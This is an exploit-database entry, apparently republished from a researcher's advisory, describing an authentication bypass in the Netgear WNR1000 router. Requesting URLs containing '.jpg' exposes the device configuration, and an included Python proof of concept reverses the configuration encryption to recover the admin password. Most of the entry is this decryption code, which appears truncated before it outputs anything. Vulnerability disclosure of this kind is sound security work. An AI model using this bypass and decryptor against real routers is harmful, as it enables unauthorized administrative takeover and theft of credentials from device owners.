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Netgear WNR1000 - Authentication Bypass

Roberto Paleari
Security Risk Medium
web applications
Date add
The web server running on the affected devices is subject to an authentication
bypass issue that allows attacker to gain administrative access, circumventing
existing authentication mechanisms.
Strictly speaking, the web server skips authentication checks for some URLs,
such as those that contain the substring ".jpg" (without quotes). As a
consequence, an attacker can retrieve the current device configuration by
accessing the following URL:
The resulting configuration file is encrypted. However the device implements a
trivial encryption scheme, that can be reversed quite easily.  From the
configuration file, attackers can extract, among the other things, the
clear-text password for the "admin" user.
A Python procedure that implements the aforementioned encryption scheme
follows (the code of this PoC is inefficient and is quite a mess):
import pyDes
import os, sys
# Encryption key is a slightly variation of "NtgrBak"
KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]
def derive_des_key(ascii_key):
    def extract_by_offset(offset):
        byte_index = offset >> 3
        bit_index  = byte_index << 3
        v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1]
        v1 = 8 - (offset - bit_index)
        v0 >>= v1
        return v0 & 0xfe
    k = ""
    for i in range(0, 7*8, 7):
        k += chr(extract_by_offset(i))
    return k
def decrypt_block(block, key_bytes):
    k = derive_des_key(key_bytes)
    des = pyDes.des(k, pyDes.ECB)
    r = des.decrypt(block)
    return r
def main():
    data = sys.stdin.read()
    assert (len(data) % 8) == 0
    current_key = KEY[:]
    r = ""
    for i in range(0, len(data), 8):
        current_key[0] += 8
        if current_key[0] > 0xff:
            current_key[0] = current_key[0] - 0x100
            current_key[1] += 1
        block = data[i:i+8]
        d = decrypt_block(block, current_key)
        r += d

#  0day.today [2024-09-28]  #